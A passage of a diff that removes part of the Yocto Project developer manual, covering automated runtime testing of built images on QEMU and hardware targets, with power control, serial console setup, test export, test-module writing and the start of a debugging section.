-                        <listitem><para>The device is then rebooted using an
-                            external script that you need to provide.
-                            </para></listitem>
-                        <listitem><para>The device boots into the image to be
-                            tested.
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-
-                <para>
-                    When running tests (independent of whether the image
-                    has been deployed automatically or not), the device is
-                    expected to be connected to a network on a
-                    pre-determined IP address.
-                    You can either use static IP addresses written into
-                    the image, or set the image to use DHCP and have your
-                    DHCP server on the test network assign a known IP address
-                    based on the MAC address of the device.
-                </para>
-
-                <para>
-                    In order to run tests on hardware, you need to set
-                    <filename>TEST_TARGET</filename> to an appropriate value.
-                    For QEMU, you do not have to change anything, the default
-                    value is "qemu".
-                    For running tests on hardware, the following options exist:
-                    <itemizedlist>
-                        <listitem><para><emphasis>"simpleremote":</emphasis>
-                            Choose "simpleremote" if you are going to
-                            run tests on a target system that is already
-                            running the image to be tested and is available
-                            on the network.
-                            You can use "simpleremote" in conjunction
-                            with either real hardware or an image running
-                            within a separately started QEMU or any
-                            other virtual machine manager.
-                            </para></listitem>
-                        <listitem><para><emphasis>"SystemdbootTarget":</emphasis>
-                            Choose "SystemdbootTarget" if your hardware is
-                            an EFI-based machine with
-                            <filename>systemd-boot</filename> as bootloader and
-                            <filename>core-image-testmaster</filename>
-                            (or something similar) is installed.
-                            Also, your hardware under test must be in a
-                            DHCP-enabled network that gives it the same IP
-                            address for each reboot.</para>
-                            <para>If you choose "SystemdbootTarget", there are
-                            additional requirements and considerations.
-                            See the
-                            "<link linkend='selecting-systemdboottarget'>Selecting SystemdbootTarget</link>"
-                            section, which follows, for more information.
-                            </para></listitem>
-                        <listitem><para><emphasis>"BeagleBoneTarget":</emphasis>
-                            Choose "BeagleBoneTarget" if you are deploying
-                            images and running tests on the BeagleBone
-                            "Black" or original "White" hardware.
-                            For information on how to use these tests, see the
-                            comments at the top of the BeagleBoneTarget
-                            <filename>meta-yocto-bsp/lib/oeqa/controllers/beaglebonetarget.py</filename>
-                            file.
-                            </para></listitem>
-                        <listitem><para><emphasis>"EdgeRouterTarget":</emphasis>
-                            Choose "EdgeRouterTarget" is you are deploying
-                            images and running tests on the Ubiquiti Networks
-                            EdgeRouter Lite.
-                            For information on how to use these tests, see the
-                            comments at the top of the EdgeRouterTarget
-                            <filename>meta-yocto-bsp/lib/oeqa/controllers/edgeroutertarget.py</filename>
-                            file.
-                            </para></listitem>
-                        <listitem><para><emphasis>"GrubTarget":</emphasis>
-                            Choose the "supports deploying images and running
-                            tests on any generic PC that boots using GRUB.
-                            For information on how to use these tests, see the
-                            comments at the top of the GrubTarget
-                            <filename>meta-yocto-bsp/lib/oeqa/controllers/grubtarget.py</filename>
-                            file.
-                            </para></listitem>
-                        <listitem><para><emphasis>"<replaceable>your-target</replaceable>":</emphasis>
-                            Create your own custom target if you want to run
-                            tests when you are deploying images and running
-                            tests on a custom machine within your BSP layer.
-                            To do this, you need to add a Python unit that
-                            defines the target class under
-                            <filename>lib/oeqa/controllers/</filename> within
-                            your layer.
-                            You must also provide an empty
-                            <filename>__init__.py</filename>.
-                            For examples, see files in
-                            <filename>meta-yocto-bsp/lib/oeqa/controllers/</filename>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='selecting-systemdboottarget'>
-                <title>Selecting SystemdbootTarget</title>
-
-                <para>
-                    If you did not set <filename>TEST_TARGET</filename> to
-                    "SystemdbootTarget", then you do not need any information
-                    in this section.
-                    You can skip down to the
-                    "<link linkend='qemu-image-running-tests'>Running Tests</link>"
-                    section.
-                </para>
-
-                <para>
-                    If you did set <filename>TEST_TARGET</filename> to
-                    "SystemdbootTarget", you also need to perform a one-time
-                    setup of your master image by doing the following:
-                    <orderedlist>
-                        <listitem><para><emphasis>Set <filename>EFI_PROVIDER</filename>:</emphasis>
-                            Be sure that <filename>EFI_PROVIDER</filename>
-                            is as follows:
-                            <literallayout class='monospaced'>
-     EFI_PROVIDER = "systemd-boot"
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para><emphasis>Build the master image:</emphasis>
-                            Build the <filename>core-image-testmaster</filename>
-                            image.
-                            The <filename>core-image-testmaster</filename>
-                            recipe is provided as an example for a
-                            "master" image and you can customize the image
-                            recipe as you would any other recipe.
-                            </para>
-                            <para>Here are the image recipe requirements:
-                            <itemizedlist>
-                                <listitem><para>Inherits
-                                    <filename>core-image</filename>
-                                    so that kernel modules are installed.
-                                    </para></listitem>
-                                <listitem><para>Installs normal linux utilities
-                                    not busybox ones (e.g.
-                                    <filename>bash</filename>,
-                                    <filename>coreutils</filename>,
-                                    <filename>tar</filename>,
-                                    <filename>gzip</filename>, and
-                                    <filename>kmod</filename>).
-                                    </para></listitem>
-                                <listitem><para>Uses a custom
-                                    Initial RAM Disk (initramfs) image with a
-                                    custom installer.
-                                    A normal image that you can install usually
-                                    creates a single rootfs partition.
-                                    This image uses another installer that
-                                    creates a specific partition layout.
-                                    Not all Board Support Packages (BSPs)
-                                    can use an installer.
-                                    For such cases, you need to manually create
-                                    the following partition layout on the
-                                    target:
-                                    <itemizedlist>
-                                        <listitem><para>First partition mounted
-                                            under <filename>/boot</filename>,
-                                            labeled "boot".
-                                            </para></listitem>
-                                        <listitem><para>The main rootfs
-                                            partition where this image gets
-                                            installed, which is mounted under
-                                            <filename>/</filename>.
-                                            </para></listitem>
-                                        <listitem><para>Another partition
-                                            labeled "testrootfs" where test
-                                            images get deployed.
-                                            </para></listitem>
-                                    </itemizedlist>
-                                    </para></listitem>
-                            </itemizedlist>
-                            </para></listitem>
-                        <listitem><para><emphasis>Install image:</emphasis>
-                            Install the image that you just built on the target
-                            system.
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-
-                <para>
-                    The final thing you need to do when setting
-                    <filename>TEST_TARGET</filename> to "SystemdbootTarget" is
-                    to set up the test image:
-                    <orderedlist>
-                        <listitem><para><emphasis>Set up your <filename>local.conf</filename> file:</emphasis>
-                            Make sure you have the following statements in
-                            your <filename>local.conf</filename> file:
-                            <literallayout class='monospaced'>
-     IMAGE_FSTYPES += "tar.gz"
-     INHERIT += "testimage"
-     TEST_TARGET = "SystemdbootTarget"
-     TEST_TARGET_IP = "192.168.2.3"
-                            </literallayout>
-                            </para></listitem>
-                        <listitem><para><emphasis>Build your test image:</emphasis>
-                            Use BitBake to build the image:
-                            <literallayout class='monospaced'>
-     $ bitbake core-image-sato
-                            </literallayout>
-                            </para></listitem>
-                    </orderedlist>
-                </para>
-            </section>
-
-            <section id='power-control'>
-                <title>Power Control</title>
-
-                <para>
-                    For most hardware targets other than "simpleremote",
-                    you can control power:
-                    <itemizedlist>
-                        <listitem><para>
-                            You can use
-                            <filename>TEST_POWERCONTROL_CMD</filename>
-                            together with
-                            <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
-                            as a command that runs on the host and does power
-                            cycling.
-                            The test code passes one argument to that command:
-                            off, on or cycle (off then on).
-                            Here is an example that could appear in your
-                            <filename>local.conf</filename> file:
-                            <literallayout class='monospaced'>
-     TEST_POWERCONTROL_CMD = "powercontrol.exp test 10.11.12.1 nuc1"
-                            </literallayout>
-                            In this example, the expect script does the
-                            following:
-                            <literallayout class='monospaced'>
-     ssh test@10.11.12.1 "pyctl nuc1 <replaceable>arg</replaceable>"
-                            </literallayout>
-                            It then runs a Python script that controls power
-                            for a label called <filename>nuc1</filename>.
-                            <note>
-                                You need to customize
-                                <filename>TEST_POWERCONTROL_CMD</filename>
-                                and
-                                <filename>TEST_POWERCONTROL_EXTRA_ARGS</filename>
-                                for your own setup.
-                                The one requirement is that it accepts
-                                "on", "off", and "cycle" as the last argument.
-                            </note>
-                            </para></listitem>
-                        <listitem><para>
-                            When no command is defined, it connects to the
-                            device over SSH and uses the classic reboot command
-                            to reboot the device.
-                            Classic reboot is fine as long as the machine
-                            actually reboots (i.e. the SSH test has not
-                            failed).
-                            It is useful for scenarios where you have a simple
-                            setup, typically with a single board, and where
-                            some manual interaction is okay from time to time.
-                            </para></listitem>
-                    </itemizedlist>
-                    If you have no hardware to automatically perform power
-                    control but still wish to experiment with automated
-                    hardware testing, you can use the dialog-power-control
-                    script that shows a dialog prompting you to perform the
-                    required power action.
-                    This script requires either KDialog or Zenity to be
-                    installed.
-                    To use this script, set the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_POWERCONTROL_CMD'><filename>TEST_POWERCONTROL_CMD</filename></ulink>
-                    variable as follows:
-                    <literallayout class='monospaced'>
-     TEST_POWERCONTROL_CMD = "${COREBASE}/scripts/contrib/dialog-power-control"
-                    </literallayout>
-                </para>
-            </section>
-
-            <section id='serial-console-connection'>
-                <title>Serial Console Connection</title>
-
-                <para>
-                    For test target classes requiring a serial console
-                    to interact with the bootloader (e.g. BeagleBoneTarget,
-                    EdgeRouterTarget, and GrubTarget), you need to
-                    specify a command to use to connect to the serial console
-                    of the target machine by using the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SERIALCONTROL_CMD'><filename>TEST_SERIALCONTROL_CMD</filename></ulink>
-                    variable and optionally the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SERIALCONTROL_EXTRA_ARGS'><filename>TEST_SERIALCONTROL_EXTRA_ARGS</filename></ulink>
-                    variable.
-                </para>
-
-                <para>
-                    These cases could be a serial terminal program if the
-                    machine is connected to a local serial port, or a
-                    <filename>telnet</filename> or
-                    <filename>ssh</filename> command connecting to a remote
-                    console server.
-                    Regardless of the case, the command simply needs to
-                    connect to the serial console and forward that connection
-                    to standard input and output as any normal terminal
-                    program does.
-                    For example, to use the picocom terminal program on
-                    serial device <filename>/dev/ttyUSB0</filename>
-                    at 115200bps, you would set the variable as follows:
-                    <literallayout class='monospaced'>
-     TEST_SERIALCONTROL_CMD = "picocom /dev/ttyUSB0 -b 115200"
-                    </literallayout>
-                    For local devices where the serial port device disappears
-                    when the device reboots, an additional "serdevtry" wrapper
-                    script is provided.
-                    To use this wrapper, simply prefix the terminal command
-                    with
-                    <filename>${COREBASE}/scripts/contrib/serdevtry</filename>:
-                    <literallayout class='monospaced'>
-     TEST_SERIALCONTROL_CMD = "${COREBASE}/scripts/contrib/serdevtry picocom -b
-115200 /dev/ttyUSB0"
-                    </literallayout>
-                </para>
-            </section>
-        </section>
-
-        <section id="qemu-image-running-tests">
-            <title>Running Tests</title>
-
-            <para>
-                You can start the tests automatically or manually:
-                <itemizedlist>
-                    <listitem><para><emphasis>Automatically running tests:</emphasis>
-                        To run the tests automatically after the
-                        OpenEmbedded build system successfully creates an image,
-                        first set the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#var-TESTIMAGE_AUTO'><filename>TESTIMAGE_AUTO</filename></ulink>
-                        variable to "1" in your <filename>local.conf</filename>
-                        file in the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>:
-                        <literallayout class='monospaced'>
-     TESTIMAGE_AUTO = "1"
-                        </literallayout>
-                        Next, build your image.
-                        If the image successfully builds, the tests run:
-                        <literallayout class='monospaced'>
-     bitbake core-image-sato
-                        </literallayout></para></listitem>
-                    <listitem><para><emphasis>Manually running tests:</emphasis>
-                        To manually run the tests, first globally inherit the
-                        <ulink url='&YOCTO_DOCS_REF_URL;#ref-classes-testimage*'><filename>testimage</filename></ulink>
-                        class by editing your <filename>local.conf</filename>
-                        file:
-                        <literallayout class='monospaced'>
-    INHERIT += "testimage"
-                        </literallayout>
-                        Next, use BitBake to run the tests:
-                        <literallayout class='monospaced'>
-     bitbake -c testimage <replaceable>image</replaceable>
-                        </literallayout></para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                All test files reside in
-                <filename>meta/lib/oeqa/runtime</filename> in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#source-directory'>Source Directory</ulink>.
-                A test name maps directly to a Python module.
-                Each test module may contain a number of individual tests.
-                Tests are usually grouped together by the area
-                tested (e.g tests for systemd reside in
-                <filename>meta/lib/oeqa/runtime/systemd.py</filename>).
-            </para>
-
-            <para>
-                You can add tests to any layer provided you place them in the
-                proper area and you extend
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
-                in the <filename>local.conf</filename> file as normal.
-                Be sure that tests reside in
-                <filename><replaceable>layer</replaceable>/lib/oeqa/runtime</filename>.
-                <note>
-                    Be sure that module names do not collide with module names
-                    used in the default set of test modules in
-                    <filename>meta/lib/oeqa/runtime</filename>.
-                </note>
-            </para>
-
-            <para>
-                You can change the set of tests run by appending or overriding
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SUITES'><filename>TEST_SUITES</filename></ulink>
-                variable in <filename>local.conf</filename>.
-                Each name in <filename>TEST_SUITES</filename> represents a
-                required test for the image.
-                Test modules named within <filename>TEST_SUITES</filename>
-                cannot be skipped even if a test is not suitable for an image
-                (e.g. running the RPM tests on an image without
-                <filename>rpm</filename>).
-                Appending "auto" to <filename>TEST_SUITES</filename> causes the
-                build system to try to run all tests that are suitable for the
-                image (i.e. each test module may elect to skip itself).
-            </para>
-
-            <para>
-                The order you list tests in <filename>TEST_SUITES</filename>
-                is important and influences test dependencies.
-                Consequently, tests that depend on other tests should be added
-                after the test on which they depend.
-                For example, since the <filename>ssh</filename> test
-                depends on the
-                <filename>ping</filename> test, "ssh" needs to come after
-                "ping" in the list.
-                The test class provides no re-ordering or dependency handling.
-                <note>
-                    Each module can have multiple classes with multiple test
-                    methods.
-                    And, Python <filename>unittest</filename> rules apply.
-                </note>
-            </para>
-
-            <para>
-                Here are some things to keep in mind when running tests:
-                <itemizedlist>
-                    <listitem><para>The default tests for the image are defined
-                        as:
-                        <literallayout class='monospaced'>
-     DEFAULT_TEST_SUITES_pn-<replaceable>image</replaceable> = "ping ssh df connman syslog xorg scp vnc date rpm dnf dmesg"
-                        </literallayout></para></listitem>
-                    <listitem><para>Add your own test to the list of the
-                        by using the following:
-                        <literallayout class='monospaced'>
-     TEST_SUITES_append = " mytest"
-                        </literallayout></para></listitem>
-                    <listitem><para>Run a specific list of tests as follows:
-                        <literallayout class='monospaced'>
-     TEST_SUITES = "test1 test2 test3"
-                        </literallayout>
-                        Remember, order is important.
-                        Be sure to place a test that is dependent on another test
-                        later in the order.</para></listitem>
-                </itemizedlist>
-            </para>
-        </section>
-
-        <section id="exporting-tests">
-            <title>Exporting Tests</title>
-
-            <para>
-                You can export tests so that they can run independently of
-                the build system.
-                Exporting tests is required if you want to be able to hand
-                the test execution off to a scheduler.
-                You can only export tests that are defined in
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-TEST_SUITES'><filename>TEST_SUITES</filename></ulink>.
-            </para>
-
-            <para>
-                If your image is already built, make sure the following are set
-                in your <filename>local.conf</filename> file:
-                <literallayout class='monospaced'>
-     INHERIT +="testexport"
-     TEST_TARGET_IP = "<replaceable>IP-address-for-the-test-target</replaceable>"
-     TEST_SERVER_IP = "<replaceable>IP-address-for-the-test-server</replaceable>"
-                </literallayout>
-                You can then export the tests with the following BitBake
-                command form:
-                <literallayout class='monospaced'>
-     $ bitbake <replaceable>image</replaceable> -c testexport
-                </literallayout>
-                Exporting the tests places them in the
-                <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                in
-                <filename>tmp/testexport/</filename><replaceable>image</replaceable>,
-                which is controlled by the
-                <filename>TEST_EXPORT_DIR</filename> variable.
-            </para>
-
-            <para>
-                You can now run the tests outside of the build environment:
-                <literallayout class='monospaced'>
-     $ cd tmp/testexport/<replaceable>image</replaceable>
-     $ ./runexported.py testdata.json
-                </literallayout>
-            </para>
-
-            <para>
-                Here is a complete example that shows IP addresses and uses
-                the <filename>core-image-sato</filename> image:
-                <literallayout class='monospaced'>
-     INHERIT +="testexport"
-     TEST_TARGET_IP = "192.168.7.2"
-     TEST_SERVER_IP = "192.168.7.1"
-                </literallayout>
-                Use BitBake to export the tests:
-                <literallayout class='monospaced'>
-     $ bitbake core-image-sato -c testexport
-                </literallayout>
-                Run the tests outside of the build environment using the
-                following:
-                <literallayout class='monospaced'>
-     $ cd tmp/testexport/core-image-sato
-     $ ./runexported.py testdata.json
-                </literallayout>
-            </para>
-        </section>
-
-        <section id="qemu-image-writing-new-tests">
-            <title>Writing New Tests</title>
-
-            <para>
-                As mentioned previously, all new test files need to be in the
-                proper place for the build system to find them.
-                New tests for additional functionality outside of the core
-                should be added to the layer that adds the functionality, in
-                <filename><replaceable>layer</replaceable>/lib/oeqa/runtime</filename>
-                (as long as
-                <ulink url='&YOCTO_DOCS_REF_URL;#var-BBPATH'><filename>BBPATH</filename></ulink>
-                is extended in the layer's
-                <filename>layer.conf</filename> file as normal).
-                Just remember the following:
-                <itemizedlist>
-                    <listitem><para>Filenames need to map directly to test
-                        (module) names.
-                        </para></listitem>
-                    <listitem><para>Do not use module names that
-                        collide with existing core tests.
-                        </para></listitem>
-                    <listitem><para>Minimally, an empty
-                        <filename>__init__.py</filename> file must exist
-                        in the runtime directory.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                To create a new test, start by copying an existing module
-                (e.g. <filename>syslog.py</filename> or
-                <filename>gcc.py</filename> are good ones to use).
-                Test modules can use code from
-                <filename>meta/lib/oeqa/utils</filename>, which are helper
-                classes.
-            </para>
-
-            <note>
-                Structure shell commands such that you rely on them and they
-                return a single code for success.
-                Be aware that sometimes you will need to parse the output.
-                See the <filename>df.py</filename> and
-                <filename>date.py</filename> modules for examples.
-            </note>
-
-            <para>
-                You will notice that all test classes inherit
-                <filename>oeRuntimeTest</filename>, which is found in
-                <filename>meta/lib/oetest.py</filename>.
-                This base class offers some helper attributes, which are
-                described in the following sections:
-            </para>
-
-            <section id='qemu-image-writing-tests-class-methods'>
-                <title>Class Methods</title>
-
-                <para>
-                    Class methods are as follows:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>hasPackage(pkg)</filename>:</emphasis>
-                            Returns "True" if <filename>pkg</filename> is in the
-                            installed package list of the image, which is based
-                            on the manifest file that is generated during the
-                            <filename>do_rootfs</filename> task.
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>hasFeature(feature)</filename>:</emphasis>
-                            Returns "True" if the feature is in
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-IMAGE_FEATURES'><filename>IMAGE_FEATURES</filename></ulink>
-                            or
-                            <ulink url='&YOCTO_DOCS_REF_URL;#var-DISTRO_FEATURES'><filename>DISTRO_FEATURES</filename></ulink>.
-                            </para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='qemu-image-writing-tests-class-attributes'>
-                <title>Class Attributes</title>
-
-                <para>
-                    Class attributes are as follows:
-                    <itemizedlist>
-                        <listitem><para><emphasis><filename>pscmd</filename>:</emphasis>
-                            Equals "ps -ef" if <filename>procps</filename> is
-                            installed in the image.
-                            Otherwise, <filename>pscmd</filename> equals
-                            "ps" (busybox).
-                            </para></listitem>
-                        <listitem><para><emphasis><filename>tc</filename>:</emphasis>
-                            The called test context, which gives access to the
-                            following attributes:
-                            <itemizedlist>
-                                <listitem><para><emphasis><filename>d</filename>:</emphasis>
-                                    The BitBake datastore, which allows you to
-                                    use stuff such as
-                                    <filename>oeRuntimeTest.tc.d.getVar("VIRTUAL-RUNTIME_init_manager")</filename>.
-                                    </para></listitem>
-                                <listitem><para><emphasis><filename>testslist</filename> and <filename>testsrequired</filename>:</emphasis>
-                                    Used internally.
-                                    The tests do not need these.
-                                    </para></listitem>
-                                <listitem><para><emphasis><filename>filesdir</filename>:</emphasis>
-                                    The absolute path to
-                                    <filename>meta/lib/oeqa/runtime/files</filename>,
-                                    which contains helper files for tests meant
-                                    for copying on the target such as small
-                                    files written in C for compilation.
-                                    </para></listitem>
-                                <listitem><para><emphasis><filename>target</filename>:</emphasis>
-                                    The target controller object used to deploy
-                                    and start an image on a particular target
-                                    (e.g. Qemu, SimpleRemote, and
-                                    SystemdbootTarget).
-                                    Tests usually use the following:
-                                    <itemizedlist>
-                                        <listitem><para><emphasis><filename>ip</filename>:</emphasis>
-                                            The target's IP address.
-                                            </para></listitem>
-                                        <listitem><para><emphasis><filename>server_ip</filename>:</emphasis>
-                                            The host's IP address, which is
-                                            usually used by the DNF test
-                                            suite.
-                                            </para></listitem>
-                                        <listitem><para><emphasis><filename>run(cmd, timeout=None)</filename>:</emphasis>
-                                            The single, most used method.
-                                            This command is a wrapper for:
-                                            <filename>ssh root@host "cmd"</filename>.
-                                            The command returns a tuple:
-                                            (status, output), which are what
-                                            their names imply - the return code
-                                            of "cmd" and whatever output
-                                            it produces.
-                                            The optional timeout argument
-                                            represents the number of seconds the
-                                            test should wait for "cmd" to
-                                            return.
-                                            If the argument is "None", the
-                                            test uses the default instance's
-                                            timeout period, which is 300
-                                            seconds.
-                                            If the argument is "0", the test
-                                            runs until the command returns.
-                                            </para></listitem>
-                                        <listitem><para><emphasis><filename>copy_to(localpath, remotepath)</filename>:</emphasis>
-                                            <filename>scp localpath root@ip:remotepath</filename>.
-                                            </para></listitem>
-                                        <listitem><para><emphasis><filename>copy_from(remotepath, localpath)</filename>:</emphasis>
-                                            <filename>scp root@host:remotepath localpath</filename>.
-                                            </para></listitem>
-                                    </itemizedlist></para></listitem>
-                            </itemizedlist></para></listitem>
-                    </itemizedlist>
-                </para>
-            </section>
-
-            <section id='qemu-image-writing-tests-instance-attributes'>
-                <title>Instance Attributes</title>
-
-                <para>
-                    A single instance attribute exists, which is
-                    <filename>target</filename>.
-                    The <filename>target</filename> instance attribute is
-                    identical to the class attribute of the same name, which
-                    is described in the previous section.
-                    This attribute exists as both an instance and class
-                    attribute so tests can use
-                    <filename>self.target.run(cmd)</filename> in instance
-                    methods instead of
-                    <filename>oeRuntimeTest.tc.target.run(cmd)</filename>.
-                </para>
-            </section>
-        </section>
-
-        <section id='installing-packages-in-the-dut-without-the-package-manager'>
-            <title>Installing Packages in the DUT Without the Package Manager</title>
-
-            <para>
-                When a test requires a package built by BitBake, it is possible
-                to install that package.
-                Installing the package does not require a package manager be
-                installed in the device under test (DUT).
-                It does, however, require an SSH connection and the target must
-                be using the <filename>sshcontrol</filename> class.
-                <note>
-                    This method uses <filename>scp</filename> to copy files
-                    from the host to the target, which causes permissions and
-                    special attributes to be lost.
-                </note>
-            </para>
-
-            <para>
-                A JSON file is used to define the packages needed by a test.
-                This file must be in the same path as the file used to define
-                the tests.
-                Furthermore, the filename must map directly to the test
-                module name with a <filename>.json</filename> extension.
-            </para>
-
-            <para>
-                The JSON file must include an object with the test name as
-                keys of an object or an array.
-                This object (or array of objects) uses the following data:
-                <itemizedlist>
-                    <listitem><para>"pkg" - A mandatory string that is the
-                        name of the package to be installed.
-                        </para></listitem>
-                    <listitem><para>"rm" - An optional boolean, which defaults
-                        to "false", that specifies to remove the package after
-                        the test.
-                        </para></listitem>
-                    <listitem><para>"extract" - An optional boolean, which
-                        defaults to "false", that specifies if the package must
-                        be extracted from the package format.
-                        When set to "true", the package is not automatically
-                        installed into the DUT.
-                        </para></listitem>
-                </itemizedlist>
-            </para>
-
-            <para>
-                Following is an example JSON file that handles test "foo"
-                installing package "bar" and test "foobar" installing
-                packages "foo" and "bar".
-                Once the test is complete, the packages are removed from the
-                DUT.
-                <literallayout class='monospaced'>
-     {
-         "foo": {
-             "pkg": "bar"
-         },
-         "foobar": [
-             {
-                 "pkg": "foo",
-                 "rm": true
-             },
-             {
-                 "pkg": "bar",
-                 "rm": true
-             }
-         ]
-     }
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='usingpoky-debugging-tools-and-techniques'>
-        <title>Debugging Tools and Techniques</title>
-
-        <para>
-            The exact method for debugging build failures depends on the nature
-            of the problem and on the system's area from which the bug
-            originates.
-            Standard debugging practices such as comparison against the last
-            known working version with examination of the changes and the
-            re-application of steps to identify the one causing the problem are
-            valid for the Yocto Project just as they are for any other system.
-            Even though it is impossible to detail every possible potential
-            failure, this section provides some general tips to aid in
-            debugging given a variety of situations.
-            <note><title>Tip</title>
-                A useful feature for debugging is the error reporting tool.
-                Configuring the Yocto Project to use this tool causes the
-                OpenEmbedded build system to produce error reporting commands as
-                part of the console output.
-                You can enter the commands after the build completes to log
-                error information into a common database, that can help you
-                figure out what might be going wrong.
-                For information on how to enable and use this feature, see the
-                "<link linkend='using-the-error-reporting-tool'>Using the Error Reporting Tool</link>"
-                section.
-            </note>
-        </para>
-
-        <para>
-            The following list shows the debugging topics in the remainder of
-            this section:
-            <itemizedlist>
-                <listitem><para>
-                    "<link linkend='dev-debugging-viewing-logs-from-failed-tasks'>Viewing Logs from Failed Tasks</link>"
-                    describes how to find and view logs from tasks that
-                    failed during the build process.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-debugging-viewing-variable-values'>Viewing Variable Values</link>"
-                    describes how to use the BitBake <filename>-e</filename>
-                    option to examine variable values after a recipe has been
-                    parsed.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='viewing-package-information-with-oe-pkgdata-util'>Viewing Package Information with <filename>oe-pkgdata-util</filename></link>"
-                    describes how to use the
-                    <filename>oe-pkgdata-util</filename> utility to query
-                    <ulink url='&YOCTO_DOCS_REF_URL;#var-PKGDATA_DIR'><filename>PKGDATA_DIR</filename></ulink>
-                    and display package-related information for built
-                    packages.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-viewing-dependencies-between-recipes-and-tasks'>Viewing Dependencies Between Recipes and Tasks</link>"
-                    describes how to use the BitBake <filename>-g</filename>
-                    option to display recipe dependency information used
-                    during the build.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-viewing-task-variable-dependencies'>Viewing Task Variable Dependencies</link>"
-                    describes how to use the
-                    <filename>bitbake-dumpsig</filename> command in
-                    conjunction with key subdirectories in the
-                    <ulink url='&YOCTO_DOCS_REF_URL;#build-directory'>Build Directory</ulink>
-                    to determine variable dependencies.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-debugging-taskrunning'>Running Specific Tasks</link>"
-                    describes how to use several BitBake options (e.g.
-                    <filename>-c</filename>, <filename>-C</filename>, and
-                    <filename>-f</filename>) to run specific tasks in the
-                    build chain.
-                    It can be useful to run tasks "out-of-order" when trying
-                    isolate build issues.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-debugging-bitbake'>General BitBake Problems</link>"
-                    describes how to use BitBake's <filename>-D</filename>
-                    debug output option to reveal more about what BitBake is
-                    doing during the build.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-debugging-buildfile'>Building with No Dependencies</link>"
-                    describes how to use the BitBake <filename>-b</filename>
-                    option to build a recipe while ignoring dependencies.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='recipe-logging-mechanisms'>Recipe Logging Mechanisms</link>"
-                    describes how to use the many recipe logging functions
-                    to produce debugging output and report errors and warnings.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='debugging-parallel-make-races'>Debugging Parallel Make Races</link>"
-                    describes how to debug situations where the build consists
-                    of several parts that are run simultaneously and when the
-                    output or result of one part is not ready for use with a
-                    different part of the build that depends on that output.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='platdev-gdb-remotedebug'>Debugging With the GNU Project Debugger (GDB) Remotely</link>"
-                    describes how to use GDB to allow you to examine running
-                    programs, which can help you fix problems.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='debugging-with-the-gnu-project-debugger-gdb-on-the-target'>Debugging with the GNU Project Debugger (GDB) on the Target</link>"
-                    describes how to use GDB directly on target hardware for
-                    debugging.
-                    </para></listitem>
-                <listitem><para>
-                    "<link linkend='dev-other-debugging-others'>Other Debugging Tips</link>"
-                    describes miscellaneous debugging tips that can be useful.
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <section id='dev-debugging-viewing-logs-from-failed-tasks'>
-            <title>Viewing Logs from Failed Tasks</title>
-
-            <para>
-                You can find the log for a task in the file
-                <filename>${</filename><ulink url='&YOCTO_DOCS_REF_URL;#var-WORKDIR'><filename>WORKDIR</filename></ulink><filename>}/temp/log.do_</filename><replaceable>taskname</replaceable>.
-                For example, the log for the
-                <ulink url='&YOCTO_DOCS_REF_URL;#ref-tasks-compile'><filename>do_compile</filename></ulink>
-                task of the QEMU minimal image for the x86 machine
-                (<filename>qemux86</filename>) might be in
-                <filename>tmp/work/qemux86-poky-linux/core-image-minimal/1.0-r0/temp/log.do_compile</filename>.
-                To see the commands
-                <ulink url='&YOCTO_DOCS_REF_URL;#bitbake-term'>BitBake</ulink>
-                ran to generate a log, look at the corresponding
-                <filename>run.do_</filename><replaceable>taskname</replaceable>
-                file in the same directory.
-            </para>
-
-            <para>
-                <filename>log.do_</filename><replaceable>taskname</replaceable>
-                and
-                <filename>run.do_</filename><replaceable>taskname</replaceable>
-                are actually symbolic links to
-                <filename>log.do_</filename><replaceable>taskname</replaceable><filename>.</filename><replaceable>pid</replaceable>
-                and
-                <filename>log.run_</filename><replaceable>taskname</replaceable><filename>.</filename><replaceable>pid</replaceable>,
-                where <replaceable>pid</replaceable> is the PID the task had
-                when it ran.
-                The symlinks always point to the files corresponding to the most
-                recent run.
-            </para>
-        </section>
-
-        <section id='dev-debugging-viewing-variable-values'>
-            <title>Viewing Variable Values</title>
-
-            <para>
-                Sometimes you need to know the value of a variable as a
-                result of BitBake's parsing step.
-                This could be because some unexpected behavior occurred
-                in your project.
-                Perhaps an attempt to
-                <ulink url='&YOCTO_DOCS_BB_URL;#modifying-existing-variables'>modify a variable</ulink>
-                did not work out as expected.
-            </para>
-
-            <para>
-                BitBake's <filename>-e</filename> option is used to display
-                variable values after parsing.
-                The following command displays the variable values after the
-                configuration files (i.e. <filename>local.conf</filename>,
-                <filename>bblayers.conf</filename>,
